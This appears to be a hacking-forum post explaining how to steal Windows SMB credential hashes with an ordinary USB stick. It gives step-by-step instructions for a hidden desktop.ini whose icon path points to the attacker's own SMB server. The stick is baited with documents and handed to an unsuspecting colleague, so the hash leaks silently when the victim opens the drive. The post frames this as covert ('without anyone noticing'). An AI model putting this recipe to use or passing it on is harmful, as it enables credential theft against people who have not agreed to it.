Jump to content

Stealth Mode - Grab SMB hashes without anyone noticing


Bytewolf

Recommended Posts

After watching the recent episode of Hak5 (2102) on Youtube, I was wondering if this smb hash grab method can be done without the duck and with a normal USB stick.

The answer is YES.

Bytewolf

@kingbytewolf

-= HowTo do it =-

  • Grab any USB-Stick you have laying around
  • Create a Directory
  • Set the System attribute of this directory with attrib +s <dirname>
  • Create a file called desktop.ini in this directory with the following content
[.ShellClassInfo]
IconResource=\\<YourIP>\tmp\demo.ico
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=-235
  • Save the desktop.ini as Unicode  or UTF-8 file
  • Set the attributes archive, hidden and system with attrib +a +h +s desktop.ini

Preparation -> Done

Put some RFCs in the directory.

Fire up the smbserver and give the Stick to your colleague that really needs these RFCs. >:-D
When he navigates to the drive you should have the hash delivered to your doorstep without any windows popping up.

PoC_AnyUSB.PNG

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...